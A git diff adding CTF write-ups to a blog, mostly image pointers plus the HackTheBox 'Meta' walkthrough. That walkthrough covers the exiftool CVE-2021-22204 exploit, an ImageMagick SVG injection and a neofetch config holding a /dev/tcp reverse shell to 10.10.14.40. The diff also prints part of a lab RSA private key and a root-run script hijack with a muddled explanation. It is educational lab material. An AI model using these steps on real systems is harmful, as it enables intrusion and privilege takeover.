+T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH +Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi +WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng +Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7 +t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq +0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE +uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y +3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ +GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F +ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb +Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr +kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+ +Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL +K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0 +kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw== +-----END RSA PRIVATE KEY----- +``` +Now that I have the RSA key in my possession, I can connect in 
SSH and get the first flag : + +![](img/image-10.webp) + +## Privilege escalation + +To start I run the [linpeas.sh](https://linpeas.sh) script to get an idea of what is present on the machine. Quickly I find a script `ssh-alert.sh` which is a script belonging to my user, but which is executed by root. + +![](img/image-11.webp) + +I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH. + +![](img/image-12.webp) + +Knowing that I can modify it, I add the following line at the end of the file. + + +```bash +echo "chmod o+x /bin/bash" >> ssh-alert.sh +``` +This allows to add to the file a `euid = 0`, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command : + +![](img/image-13.webp) + +I am now root of the machine and I can recover the last flag. + + +```bash +bash-4.4# cat /root/root.txt +0abb3c1b4d046ab54e80851cf85c6448 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the image converter to avoid XSS +- Launch web applications with a user with minimum rights and no RSA key +- Do not let a user-modifiable script be executed by root diff --git a/content/writeup-ctf/writeup-meta-htb/featured.png b/content/writeup-ctf/writeup-meta-htb/featured.png new file mode 100644 index 0000000..2fa0036 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9b123f854cdaf0913e5181bec013df3118a41e734675bfb5c01049f44a24ff0 +size 335341 diff --git a/content/writeup-ctf/writeup-meta-htb/featured.webp b/content/writeup-ctf/writeup-meta-htb/featured.webp new file mode 100644 index 0000000..2a955ac --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/featured.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5254672588d76561ea4bc601be5938911792e346ea958fae212fc5202e3eab66 +size 26222 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.png b/content/writeup-ctf/writeup-meta-htb/img/image-1.png new file mode 100644 index 0000000..eea9699 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7b5c689e473d8fbe5f38d56569bcc4ca6a0954cd219818717b3305fce1ff46a +size 34361 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.webp b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp new file mode 100644 index 0000000..fca9deb --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:853ef003a811f2876b9c617786e32d66321b9421968b4b0ad84afef84d28ea8e +size 30872 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.png b/content/writeup-ctf/writeup-meta-htb/img/image-10.png new file mode 100644 index 0000000..19611b7 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcad2520cf7701c87fb90128edd4eaf113223d4d05af145529a1a0da1ac4e590 +size 16811 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.webp b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp new file mode 100644 index 0000000..164910b --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:783ed4fc9ecc737bde285df0a148d0d079b63946b5f2d2a81f896e712e61757e +size 21830 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.png b/content/writeup-ctf/writeup-meta-htb/img/image-11.png new file mode 100644 index 0000000..64b49b2 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:705f86e611afda24e6edf49fb3da1cc21c397f01cab01a0f6d8e420a98c7c644 +size 46894 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.webp b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp new file mode 100644 index 0000000..bd51874 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6707d853dc7c153fac5707f0ab21f18576648cd44181e81e318b02a1c8d4c55b +size 50798 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.png b/content/writeup-ctf/writeup-meta-htb/img/image-12.png new file mode 100644 index 0000000..96ace65 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86b1a5da73f2997b4e3c8096bc1c5dd8a64cda3b11d8db942e39caa07ef87b8d +size 17079 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.webp b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp new file mode 100644 index 0000000..b581b34 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71ac0c4b822e72f5d4565ad40fd869c461aa8adb6dab99f36109337f3a698bce +size 16432 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.png b/content/writeup-ctf/writeup-meta-htb/img/image-13.png new file mode 100644 index 0000000..54b2cef --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd3f8a6b78074a7773eb4a39ab6fc755b0a1f2ad87e46f34312983c540ad456a +size 17702 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.webp b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp new file mode 100644 index 0000000..bf1f3fb --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a9d91af638f535f4a8ab5aa73669eb257b73b01f87d36e3ce10b94c83b18db4 +size 18794 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.png b/content/writeup-ctf/writeup-meta-htb/img/image-2.png new file mode 100644 index 0000000..b9aee5b --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b623aedcb82404216cce2e83666511da3160eef05e8128cd9cabc42b6d37200c +size 426544 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.webp b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp new file mode 100644 index 0000000..075f3a6 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aab7ba3a46c9729e0926da84663aba1cbb3f75a00c54d1c1fbaae48f1fb8771d +size 62666 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.png b/content/writeup-ctf/writeup-meta-htb/img/image-3.png new file mode 100644 index 0000000..53e5c94 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5615e9cb916408f940b04b704342441c9cb0220e835205b8f3c65d55026ee18e +size 59451 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.webp b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp new file mode 100644 index 0000000..a233aa4 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7d86013fd1e3395af6eccc367c1d70528930db41846e188a84975b954e18aa8 +size 48820 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.png b/content/writeup-ctf/writeup-meta-htb/img/image-4.png new file mode 100644 index 0000000..3331bca --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d11fcec8942c33e8a5b8ae8c50009c00c14e92a7e35838c316f071fdd1eb4e8 +size 45576 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.webp b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp new file mode 100644 index 0000000..cb09238 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2269965ced9ff05d0ae6dc5c19698def5731f750f31021a09a88bb0c8e90cc19 +size 41664 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.png b/content/writeup-ctf/writeup-meta-htb/img/image-5.png new file mode 100644 index 0000000..c8a56ac --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d775632d712642a82e51af075dccae2ba560077bcfb398dd818ed63bcc987baa +size 13111 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.webp b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp new file mode 100644 index 0000000..374da45 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5beacab68bc524723e60a73148fcbcd7db35ad50107351ff9a0ef2d577a74432 +size 10042 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.png b/content/writeup-ctf/writeup-meta-htb/img/image-6.png new file mode 100644 index 0000000..532949d --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2a56052b6bc7580a6452888fcbfbfabceebf4dce90482be765b1450a3daffc2 +size 12623 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.webp b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp new file mode 100644 index 0000000..22dab5e --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c42d578f4c3dacae10bb1184e35b6879fca2b63b59edf8664819f54277b86b35 +size 6198 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.png b/content/writeup-ctf/writeup-meta-htb/img/image-7.png new file mode 100644 index 0000000..c383595 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3022af18d3cd2b16ff1a9dd18952e9a6006777aa56eca1d62e70a266bb2b9ed4 +size 39980 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.webp b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp new file mode 100644 index 0000000..dfdacd5 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fa7725ee1232e07d7ff01d311cb3ae9e0f91641490a218b702fa3333ce5190f +size 21094 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.png b/content/writeup-ctf/writeup-meta-htb/img/image-8.png new file mode 100644 index 0000000..df3d535 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d9fbb1ed77c5ed6c273f00d51cf1b4160783117bda2f965e23b70f84d422b89 +size 61515 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.webp b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp new file mode 100644 index 0000000..9d0537d --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8db35e3f99601f628450db664ec996186162a3370b1e2670a3aaf6dd7ecc1222 +size 53324 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.png b/content/writeup-ctf/writeup-meta-htb/img/image-9.png new file mode 100644 index 0000000..da3d308 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a64857ed6a921ae8e02c7283a17bc0ea56698e2cfe8d0299ebf5aa594e93f5c6 +size 13912 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.webp b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp new file mode 100644 index 0000000..db5a4b8 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62a8120a76a71d8537ebcb7b1bf2d6202147e44312c3b98e88787e3da95a620d +size 13348 diff --git a/content/writeup-ctf/writeup-meta-htb/index.md b/content/writeup-ctf/writeup-meta-htb/index.md new file mode 100644 index 0000000..a181034 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/index.md 
@@ -0,0 +1,153 @@ +--- +title: "Writeup - Meta (HTB)" +date: 2022-04-03 +slug: "writeup-meta-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Meta](https://app.hackthebox.com/machines/Meta) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.119.94 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.9p1) +- 80/tcp : HTTP web server (Apache httpd) + +![](img/image-2.webp) + +## Exploit + +At first I order by listing the different pages of the site. + +![](img/image-3.webp) + +Nothing in particular, I continue by making an enumeration of the subdomains. + +![](img/image-4.webp) + +Ok, there is a subdomain, I add it to the `/etc/hosts` file, then I access it via a browser. + +![](img/image-5.webp) + +It is a page that redirects us to another page that contains a form to upload a file. + +![](img/image-6.webp) + +So I try to upload an image to see what the page tells me: + +![](img/image-7.webp) + +The result reminds me strongly of a crypto tool I already used: `exiftool`. + +![](img/image-8.webp) + +So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this [github](https://github.com/convisolabs/CVE-2021-22204-exiftool). + +It is a tool for image modification and reverse shell insertion. 
+ + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ python3 exploit.py + 1 image files updated +``` +Once the image is modified, I upload it and it creates the reverse shell: + +![](img/image-9.webp) + +I look for the location of the flag with the following command: + + +```bash +find / -name user.txt 2>/dev/null +``` +I find that the flag is in `thomas` personal file, but I don't have the rights to read it... + +So I am looking for a way to change the user. In the site folder, I find a folder `convert_image`... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system: + + +```bash +www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null +/dev/null +/usr/local/bin/convert_images.sh +/var/www/dev01.artcorp.htb/convert_images +``` +There is a script with the same name! Looking at the content, I can see that it uses the `[mogrify](https://linux.die.net/man/1/mogrify)` service to perform the conversion of the images in the folder. + + +```bash +#!/bin/bash +cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null +pkill mogrify +``` +I look for the version of the service with the following command: + +![](img/image-10.webp) + +Then I look if there are some feats. After some research I find this [exploit](https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html). It allows to do a shell injection in an SVG image. + +So I use the template provided in the article, then I modify it to get the content of the `id_rsa` file of the user `thomas`. + + +```bash + + + + + + + + + +``` +Then I copy the file to the `convert_images` folder. After a few seconds I find the newly created file in the `/dev/shm`. + +Now that I have this file, I add the privileges and create an SSH session: + +![](img/image-11.webp) + +I now have a shell as `thomas` and I get the first flag. 
+ +## Privilege escalation + +I start by checking the sudo permissions of my user. I notice 2 things: + +- I have the right to use the command `/usr/bin/neofetch \"\"` as root +- The environment variable `XDG_CONFIG_HOME` is kept when running sudo + +![](img/image-12.webp) + +After some research, I find that `neofetch` has a file in configuration in the folder `~/.config/neofetch/`. So I start by putting a reverse shell in this config file. + + +```bash +thomas@meta:~/.config/neofetch$ cd .config/neofetch/ +thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf +``` +Then I set the variable `XDG_CONFIG_HOME` with the `.local` of my user. Then I run `neofetch` as sudo. + + +```bash +thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config" +thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\" +``` +I now have a reverse shell `root` and I can get the last flag. + +![](img/image-13.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update `exiftool` to avoid CVE-2021-22204 +- Update `mogrify` to avoid shell injection exploit +- Disable the option to keep the`XDG_CONFIG_HOME` variable at runtime with sudo diff --git a/content/writeup-ctf/writeup-networked-htb/featured.png b/content/writeup-ctf/writeup-networked-htb/featured.png new file mode 100644 index 0000000..91b852d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c47b86db44402af1e96309d05c74412804b6ec2e4005e11981045edb56c8bb1 +size 381351 diff --git a/content/writeup-ctf/writeup-networked-htb/featured.webp b/content/writeup-ctf/writeup-networked-htb/featured.webp new file mode 100644 index 0000000..76f295b --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/featured.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ba506bb571577254cbf0673f3c4cf22dab0c62a179fbe5d207aa51191392d49 +size 37858 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.png b/content/writeup-ctf/writeup-networked-htb/img/image-1.png new file mode 100644 index 0000000..0d2cd35 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7aad33039dfc3dc6ddb53e26b4282aecc1172caa3cbbe69385db52ffa5dcf0af +size 36387 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.webp b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp new file mode 100644 index 0000000..9b22e14 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baf1f6e8811bcf5ff967bfae5c81bb4b952705f734b4436e21bbcc5033241a62 +size 37430 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.png b/content/writeup-ctf/writeup-networked-htb/img/image-10.png new file mode 100644 index 0000000..f7a29f3 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6291300663d1252430bf610273f951c0b05769d4248d82fc3263018c4bdbe2e +size 33221 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.webp b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp new file mode 100644 index 0000000..2ec401d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a0bb9589e6e095560a91c515ca3a93201b8aff90d00eda42b87f51b8b148dd +size 30636 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.png b/content/writeup-ctf/writeup-networked-htb/img/image-11.png new file mode 100644 index 0000000..552e78c --- /dev/null 
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27180d60c4ce86c58a410a41f9e2c17d2caba4494cede04bd81fe4106ee3511e +size 17951 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.webp b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp new file mode 100644 index 0000000..5dfe865 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7f9b57d088c8f83d5944029681e564c4e95f4f07ae39526fb479457f1952455 +size 29134 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.png b/content/writeup-ctf/writeup-networked-htb/img/image-12.png new file mode 100644 index 0000000..84ed5c8 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7307cc8697dd70644fd5dc78f033aee0f5dd7b47d26030c41ac15334280d268 +size 16308 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.webp b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp new file mode 100644 index 0000000..dbd08f6 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:308492e1879bcc4e99a02142c67ae081146eb02b5dfec2a8582da02a04c5bd14 +size 15396 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.png b/content/writeup-ctf/writeup-networked-htb/img/image-13.png new file mode 100644 index 0000000..fe8b2d4 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b48cad07953532e26b027bc64b8219959b278801db72ba3c867532cca6fe9b4 +size 23816 
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.webp b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp new file mode 100644 index 0000000..09eeacb --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c41de94140b934b21ea165ee1f57972e7992544efb178ccaff49f3f8b4b482d +size 36862 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.png b/content/writeup-ctf/writeup-networked-htb/img/image-14.png new file mode 100644 index 0000000..06ca7fb --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c02571f6a24a3534f5421bc0b82644ef405133671d5921ce01a5343f0a7e9f5 +size 18539 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.webp b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp new file mode 100644 index 0000000..4654601 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:893ca0e01605f356797e789d696a274a25128ebe702e48d092498abb45c75324 +size 18794 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.png b/content/writeup-ctf/writeup-networked-htb/img/image-2.png new file mode 100644 index 0000000..e789b2e --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a52652cbdb94366f0484677a906656a81f52c9d4915c2f711709d1ced301a53 +size 13489 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.webp b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp new file mode 100644 index 0000000..0d4515f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5df2eebc7232e32393886374cc7a126d15197afdeafb7017762e229f8886548a +size 9950 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.png b/content/writeup-ctf/writeup-networked-htb/img/image-3.png new file mode 100644 index 0000000..cfeaa29 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:062ccfa834fb7fb1ae151d6c3c9dbc9c7b50457ee9789887200fb02adf2bf176 +size 107000 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.webp b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp new file mode 100644 index 0000000..fa5bc9f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea79ab201396f627e2dffdaa075c40e17cbae87cc46402533854265b96cd7d7e +size 105768 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.png b/content/writeup-ctf/writeup-networked-htb/img/image-4.png new file mode 100644 index 0000000..44abaf2 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a8cd3f972a1f690c96e232f9ca7cc65f944416e3c945c4d0c10680f7933c055 +size 16152 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.webp b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp new file mode 100644 index 0000000..dc73d7f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8ae627cf32e2bf5e752f54e68a67705ef1a52481352a526490264a54dfd3779 +size 13876 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.png b/content/writeup-ctf/writeup-networked-htb/img/image-5.png new file mode 100644 index 0000000..a497679 --- /dev/null 
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aef4f75daca24d531ddc55bd1f55407e5e1a93e2c9c512ac561f99add6a1246e +size 13831 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.webp b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp new file mode 100644 index 0000000..8b1bd79 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ceea671b0d077498469e8c0a474707d42b44ce1cc57a96f54c75207d3b4d97 +size 19540 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.png b/content/writeup-ctf/writeup-networked-htb/img/image-6.png new file mode 100644 index 0000000..eccc0fc --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f448a13b7634ed59a703671e65eb7d98cc74332e6bd8e0e42ccbcd7fe213f54b +size 17816 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.webp b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp new file mode 100644 index 0000000..3fc563a --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48528e433857ea0c78c2a7d9d714e805285e3cd367af34435bd2c42e23e1e7cd +size 18184 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.png b/content/writeup-ctf/writeup-networked-htb/img/image-7.png new file mode 100644 index 0000000..901819d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3538620e15395cc0acf6aa0063e0bb4c707f40a3aff0938d865694fd81f431af +size 2578 
